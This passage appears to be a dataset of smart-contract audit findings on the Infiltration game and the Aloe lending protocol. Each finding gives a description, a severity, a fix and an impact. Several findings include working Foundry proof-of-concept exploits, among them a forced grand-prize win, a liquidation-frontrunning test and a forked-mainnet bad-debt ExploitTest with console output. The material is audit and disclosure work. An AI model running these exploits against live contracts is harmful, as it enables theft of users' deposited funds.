gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n\\nFollowing check inside of claimPrize pays price to first ID agent:\\n```\\nuint256 agentId = agents[1].agentId;\\n_assertAgentOwnership(agentId);\\n```\\n\\nSee following POC:\\nPOC\\nPut this into Infiltration.mint.t.sol and run `forge test --match-test forceWin -vvv`\\n```\\nfunction test_forceWin() public {\\n address attacker = address(1337);\\n\\n //prefund attacker and user1\\n vm.deal(user1, PRICE * MAX_MINT_PER_ADDRESS);\\n vm.deal(attacker, PRICE * MAX_MINT_PER_ADDRESS);\\n\\n // MINT some agents\\n vm.warp(_mintStart());\\n // attacker wants to make sure he owns a bunch of agents with low IDs!!\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n // For simplicity we mint only 1 agent to user 1 here, but it could be more, they could get wounded, etc.\\n vm.prank(user1);\\n infiltration.mint{value: PRICE *1}({quantity: 1});\\n //Attacker also wants a bunch of agents with the highest IDs, as they are getting swapped with the killed agents (move forward)\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n \\n vm.warp(_mintEnd());\\n\\n //start the game\\n vm.prank(owner);\\n infiltration.startGame();\\n\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n randomWords[0] = 69_420;\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(1), randomWords);\\n // Now we are in round 2 we do have 1 wounded agent (but we can imagine any of our agent got wounded, doesn´t really matter)\\n \\n // we know with our HARDCODED RANDOMNESS THAT AGENT 3 gets wounded!!\\n\\n // Whenever we get in a situation, that we own all active agents, but 1 and our agent has a lower index we can instant win the game!!\\n // This is done by escaping all agents, at once, except the lowest index\\n uint256[] memory escapeIds = new uint256[](59);\\n escapeIds[0] = 1;\\n escapeIds[1] = 2;\\n uint256 i = 4; //Scipping our wounded AGENT 3\\n for(; i < 31;) {\\n escapeIds[i-2] = i;\\n unchecked {++i;}\\n }\\n //skipping 31 as this owned by user1\\n unchecked {++i;}\\n for(; i < 62;) {\\n escapeIds[i-3] = i;\\n unchecked {++i;}\\n }\\n vm.prank(attacker);\\n infiltration.escape(escapeIds);\\n\\n (uint16 activeAgents, uint16 woundedAgents, , uint16 deadAgents, , , , , , , ) = infiltration.gameInfo();\\n console.log(\"Active\", activeAgents);\\n assertEq(activeAgents, 1);\\n // This will end the game instantly.\\n //owner should not be able to start new round\\n vm.roll(block.number + BLOCKS_PER_ROUND);\\n vm.prank(owner);\\n vm.expectRevert();\\n infiltration.startNewRound();\\n\\n //Okay so the game is over, makes sense!\\n // Now user1 has the only active AGENT, so he should claim the grand prize!\\n // BUT user1 cannot\\n vm.expectRevert(IInfiltration.NotAgentOwner.selector);\\n vm.prank(user1);\\n infiltration.claimGrandPrize();\\n\\n //instead the attacker can:\\n vm.prank(attacker);\\n infiltration.claimGrandPrize();\\n \\n```\\nчStart a new Round before the real end of game to clear all wounded agents and reorder IDs.чAttacker can steal the grand price of the actual winner by force ending the game trough escapes.\\nThis also introduces problems if there are other players with wounded agents but lower < 50 TokenID, they can claim prices for wounded agents, which will break parts of the game logic.ч```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n -Agents with Healing Opportunity Will Be Terminated Directly if The `escape` Reduces activeAgents to the Number of `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS` or FewerчmediumчIn each round, agents have the opportunity to either `escape` or `heal` before the `_requestForRandomness` function is called. However, the order of execution between these two functions is not specified, and anyone can be executed at any time just before `startNewRound`. Typically, this isn't an issue. However, the problem arises when there are only a few Active Agents left in the game.\\nOn one hand, the `heal` function requires that the number of `gameInfo.activeAgents` is greater than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`.\\n```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n\\nOn the other hand, the `escape` function will directly set the status of agents to \"ESCAPE\" and reduce the count of `gameInfo.activeAgents`.\\n```\\n function escape(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n\\n uint256 agentIdsCount = agentIds.length;\\n _assertNotEmptyAgentIdsArrayProvided(agentIdsCount);\\n\\n uint256 activeAgents = gameInfo.activeAgents;\\n uint256 activeAgentsAfterEscape = activeAgents - agentIdsCount;\\n _assertGameIsNotOverAfterEscape(activeAgentsAfterEscape);\\n\\n uint256 currentRoundAgentsAlive = agentsAlive();\\n\\n uint256 prizePool = gameInfo.prizePool;\\n uint256 secondaryPrizePool = gameInfo.secondaryPrizePool;\\n uint256 reward;\\n uint256[] memory rewards = new uint256[](agentIdsCount);\\n\\n for (uint256 i; i < agentIdsCount; ) {\\n uint256 agentId = agentIds[i];\\n _assertAgentOwnership(agentId);\\n\\n uint256 index = agentIndex(agentId);\\n _assertAgentStatus(agents[index], agentId, AgentStatus.Active);\\n\\n uint256 totalEscapeValue = prizePool / currentRoundAgentsAlive;\\n uint256 rewardForPlayer = (totalEscapeValue * _escapeMultiplier(currentRoundAgentsAlive)) /\\n ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n rewards[i] = rewardForPlayer;\\n reward += rewardForPlayer;\\n\\n uint256 rewardToSecondaryPrizePool = (totalEscapeValue.unsafeSubtract(rewardForPlayer) *\\n _escapeRewardSplitForSecondaryPrizePool(currentRoundAgentsAlive)) / ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n\\n unchecked {\\n prizePool = prizePool - rewardForPlayer - rewardToSecondaryPrizePool;\\n }\\n secondaryPrizePool += rewardToSecondaryPrizePool;\\n\\n _swap({\\n currentAgentIndex: index,\\n lastAgentIndex: currentRoundAgentsAlive,\\n agentId: agentId,\\n newStatus: AgentStatus.Escaped\\n });\\n\\n unchecked {\\n --currentRoundAgentsAlive;\\n ++i;\\n }\\n }\\n\\n // This is equivalent to\\n // unchecked {\\n // gameInfo.activeAgents = uint16(activeAgentsAfterEscape);\\n // gameInfo.escapedAgents += uint16(agentIdsCount);\\n // }\\n```\\n\\nThrerefore, if the `heal` function is invoked first then the corresponding Wounded Agents will be healed in function `fulfillRandomWords`. If the `escape` function is invoked first and the number of `gameInfo.activeAgents` becomes equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the `heal` function will be disable. This obviously violates the fairness of the game.\\nExample\\nConsider the following situation:\\nAfter Round N, there are 100 agents alive. And, 1 Active Agent wants to `escape` and 10 Wounded Agents want to `heal`.\\nRound N:\\nActive Agents: 51\\nWounded Agents: 49\\nHealing Agents: 0\\nAccording to the order of execution, there are two situations. Please note that the result is calculated only after `_healRequestFulfilled`, so therer are no new wounded or dead agents\\nFirst, invoking `escape` before `heal`. `heal` is disable and all Wounded Agents are killed because there are not enough Active Agents.\\nRound N+1:\\nActive Agents: 50\\nWounded Agents: 0\\nHealing Agents: 0\\nSecond, invoking `heal` before `escape`. Suppose that `heal` saves 5 agents, and we got:\\nRound N+1:\\nActive Agents: 55\\nWounded Agents: 39\\nHealing Agents: 0\\nObviously, different execution orders lead to drastically different outcomes, which affects the fairness of the game.чIt is advisable to ensure that the `escape` function is always called after the `heal` function in every round. This guarantees that every wounded agent has the opportunity to `heal` themselves when there are a sufficient number of `activeAgents` at the start of each round. This approach can enhance fairness and gameplay balance.чIf some Active Agents choose to escape, causing the count of `activeAgents` to become equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the Wounded Agents will lose their final chance to heal themselves.\\nThis situation can significantly impact the game's fairness. The Wounded Agents would have otherwise had the opportunity to heal themselves and continue participating in the game. However, the escape of other agents leads to their immediate termination, depriving them of that chance.ч```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n -Wound agent can't invoke heal in the next roundчmediumчAssume players being marked as wounded in the round `12` , players cannot invoke `heal` in the next round 13\\n```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\nч```\\n // No need to check if the heal deadline has passed as the agent would be killed\\n unchecked {\\n- if (currentRoundId - woundedAt < 2) {\\n- if (currentRoundId - woundedAt < 1) {\\n revert HealingMustWaitAtLeastOneRound();\\n }\\n }\\n```\\nчUser have to wait for 1 more round which led to the odds for an Agent to heal successfully start at 99% at Round 1 reduce to 98% at Round 2.ч```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n -fulfillRandomWords() could revert under certain circumstancesчmediumчCrucial part of my POC is the variable AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS. I communicated with the protocol's team that they plan to set it to 20 initially but it is possible to have a different value for it in future. For the POC i used 30.\\n```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n\\nI put this test into Infiltration.startNewRound.t.sol and used --gas-report to see that the gas used for fulfillRandomWords exceeds 2 500 000.чA couple of ideas :\\nYou can limit the value of AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS to a small enough number so that it is 100% sure it will not reach the gas limit.\\nConsider simply storing the randomness and taking more complex follow-on actions in separate contract calls as stated in the \"Security Considerations\" section of the VRF's docs.чDOS of the protocol and inability to continue the game.ч```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n -Oracle.sol: manipulation via increasing Uniswap V3 pool observationCardinalityчhighчThe `Oracle.consult` function takes a `uint40 seed` parameter and can be used in either of two ways:\\nSet the highest 8 bit to a non-zero value to use Uniswap V3's binary search to get observations\\nSet the highest 8 bit to zero and use the lower 32 bits to provide hints and use the more efficient internal `Oracle.observe` function to get the observations\\nThe code for Aloe's `Oracle.observe` function is adapted from Uniswap V3's Oracle library.\\nTo understand this issue it is necessary to understand Uniswap V3's `observationCardinality` concept.\\nA deep dive can be found here.\\nIn short, it is a circular array of variable size. The size of the array can be increased by ANYONE via calling `Pool.increaseObservationCardinalityNext`.\\nThe Uniswap V3 `Oracle.write` function will then take care of actually expanding the array once the current index has reached the end of the array.\\nAs can be seen in this function, uninitialized entries in the array have their timestamp set to `1`.\\nAnd all other values in the observation struct (array element) are set to zero:\\n```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n\\nHere's an example for a simplified array to illustrate how the Aloe `Oracle.observe` function might read an invalid value:\\n```\\nAssume we are looking for the target=10 timestamp.\\n\\nAnd the observations array looks like this (element values are timestamps):\\n\\n| 12 | 20 | 25 | 30 | 1 | 1 | 1 |\\n\\nThe length of the array is 7.\\n\\nLet's say we provide the index 6 as the seed and the current observationIndex is 3 (i.e. pointing to timestamp 30)\\n\\nThe Oracle.observe function then chooses 1 as the left timestamp and 12 as the right timestamp.\\n\\nThis means the invalid and uninitialized element at index 6 with timestamp 1 will be used to calculate the Oracle values.\\n```\\n\\nHere is the section of the `Oracle.observe` function where the invalid element is used to calculate the result.\\nBy updating the observations (e.g. swaps in the Uniswap pool), an attacker can influence the value that is written on the left of the array, i.e. he can arrange for a scenario such that he can make the Aloe `Oracle` read a wrong value.\\nUpstream this causes the Aloe `Oracle` to continue calculation with `tickCumulatives` and `secondsPerLiquidityCumulativeX128s` haing a corrupted value. Either `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` AND `secondsPerLiquidityCumulativeX128s[1]`, `tickCumulatives[1]` or only `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` are assigned invalid values (depending on what the timestamp on the left of the array is).чThe `Oracle.observe` function must not consider observations as valid that have not been initialized.\\nThis means the `initialized` field must be queried here and here and must be skipped over.чThe corrupted values are then used in the further calculations in `Oracle.consult` which reports its results upstream to `VolatilityOracle.update` and `VolatilityOracle.consult`, making their way into the core application.\\nThe TWAP price can be inflated such that bad debt can be taken on due to inflated valuation of Uniswap V3 liqudity.\\nBesides that there are virtually endless possibilities for an attacker to exploit this scenario since the Oracle is at the very heart of the Aloe application and it's impossible to foresee all the permutations of values that a determined attacker may use.\\nE.g. the TWAP price is used for liquidations where an incorrect TWAP price can lead to profit. If the protocol expects you to exchange 1 BTC for 10k USDC, then you end up with ~20k profit.\\nSince an attacker can make this scenario occur on purpose by updating the Uniswap observations (e.g. by executing swaps) and increasing observation cardinality, the severity of this finding is \"High\".ч```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n -It is possible to frontrun liquidations with self liquidation with high strain value to clear warning and keep unhealthy positions from liquidationчhighч`Borrower.warn` sets the time when the liquidation (involving swap) can happen:\\n```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n\\nBut `Borrower.liquidation` clears the warning regardless of whether account is healthy or not after the repayment:\\n```\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n```\\n\\nThe scenario above is demonstrated in the test, add this to Liquidator.t.sol:\\n```\\nfunction test_liquidationFrontrun() public {\\n uint256 margin0 = 1595e18;\\n uint256 margin1 = 0;\\n uint256 borrows0 = 0;\\n uint256 borrows1 = 1e18 * 100;\\n\\n // Extra due to rounding up in liabilities\\n margin0 += 1;\\n\\n deal(address(asset0), address(account), margin0);\\n deal(address(asset1), address(account), margin1);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, borrows1);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(lender1.borrowBalance(address(account)), borrows1);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n assertEq(asset1.balanceOf(address(account)), borrows1 + margin1);\\n\\n _setInterest(lender0, 10100);\\n _setInterest(lender1, 10100);\\n\\n account.warn((1 << 32));\\n\\n uint40 unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, block.timestamp + LIQUIDATION_GRACE_PERIOD);\\n\\n skip(LIQUIDATION_GRACE_PERIOD + 1);\\n\\n // listen for liquidation, or be the 1st in the block when warning is cleared\\n // liquidate with very high strain, basically keeping the position, but clearing the warning\\n account.liquidate(this, bytes(\"\"), 1e10, (1 << 32));\\n\\n unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, 0);\\n\\n // the liquidation command we've frontrun will now revert (due to warning not set: \"Aloe: grace\")\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n}\\n```\\nчConsider clearing \"warn\" status only if account is healthy after liquidation.чVery important protocol function (liquidation) can be DOS'ed and make the unhealthy accounts avoid liquidations for a very long time. Malicious users can thus open huge risky positions which will then go into bad debt causing loss of funds for all protocol users as they will not be able to withdraw their funds and can cause a bank run - first users will be able to withdraw, but later users won't be able to withdraw as protocol won't have enough funds for this.ч```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n -`Borrower`'s `modify`, `liquidate` and `warn` functions use stored (outdated) account liabilities which makes it possible for the user to intentionally put him into bad debt in 1 transactionчhighчPossible scenario for the intentional creation of bad debt:\\nBorrow max amount at max leverage + some safety margin so that position is healthy for the next few days, for example borrow 10000 DAI, add margin of 1051 DAI for safety (51 DAI required for `MAX_LEVERAGE`, 1000 DAI safety margin)\\nWait for a long period of market inactivity (such as 1 day).\\nAt this point `borrowBalance` is greater than `borrowBalanceStored` by a value higher than `MAX_LEVERAGE` (example: `borrowBalance` = 10630 DAI, `borrowBalanceStored` = 10000 DAI)\\nCall `modify` and withdraw max possible amount (based on borrowBalanceStored), for example, withdraw 1000 DAI (remaining assets = 10051 DAI, which is healthy based on stored balance of 10000 DAI, but in fact this is already a bad debt, because borrow balance is 10630, which is more than remaining assets). This works, because liabilities used are outdated.\\nAt this point the user is already in bad debt, but due to points 1-2, it's still not liquidatable. After calling `Lender.accrueInterest` the account can be liquidated. This bad debt caused is the funds lost by the other users.\\nThis scenario is not profitable to the malicious user, but can be modified to make it profitable: the user can deposit large amount to lender before these steps, meaning the inflated interest rate will be accured by user's deposit to lender, but it will not be paid by the user due to bad debt (user will deposit 1051 DAI, withdraw 1000 DAI, and gain some share of accured 630 DAI, for example if he doubles the lender's TVL, he will gain 315 DAI - protocol fees).\\nThe scenario above is demonstrated in the test, create test/Exploit.t.sol:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport \"forge-std/Test.sol\";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from \"src/libraries/constants/Constants.sol\";\\nimport {Q96} from \"src/libraries/constants/Q.sol\";\\nimport {zip} from \"src/libraries/Positions.sol\";\\n\\nimport \"src/Borrower.sol\";\\nimport \"src/Factory.sol\";\\nimport \"src/Lender.sol\";\\nimport \"src/RateModel.sol\";\\n\\nimport {FatFactory, VolatilityOracleMock} from \"./Utils.sol\";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? _A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl(\"mainnet\"));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint(\"User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"User stored borrow:\", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the \"extra\" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n\\n emit log_named_uint(\"Before liquidation User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Before liquidation User stored borrow:\", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint(\"Before liquidation User assets:\", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(\"\"), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(\"Liquidated User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Liquidated User assets:\", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(\"\"));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(\"\"));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 10629296791890000000000\\n User stored borrow:: 10000000000000000000000\\n Before liquidation User borrow:: 10630197795010000000000\\n Before liquidation User stored borrow:: 10630197795010000000000\\n Before liquidation User assets:: 10051000000000000000000\\n Liquidated User borrow:: 579197795010000000001\\n Liquidated User assets:: 0\\n```\\n\\nAs can be seen, in the end user debt is 579 DAI with 0 assets.чConsider using `borrowBalance` instead of `borrowBalanceStored` in `_getLiabilities()`.чMalicious user can create bad debt to his account in 1 transaction. Bad debt is the amount not withdrawable from the lender by users who deposited. Since users will know that the lender doesn't have enough assets to pay out to all users, it can cause bank run since first users to withdraw from lender will be able to do so, while those who are the last to withdraw will lose their funds.ч```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport \"forge-std/Test.sol\";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from \"src/libraries/constants/Constants.sol\";\\nimport {Q96} from \"src/libraries/constants/Q.sol\";\\nimport {zip} from \"src/libraries/Positions.sol\";\\n\\nimport \"src/Borrower.sol\";\\nimport \"src/Factory.sol\";\\nimport \"src/Lender.sol\";\\nimport \"src/RateModel.sol\";\\n\\nimport {FatFactory, VolatilityOracleMock} from \"./Utils.sol\";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? _A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable 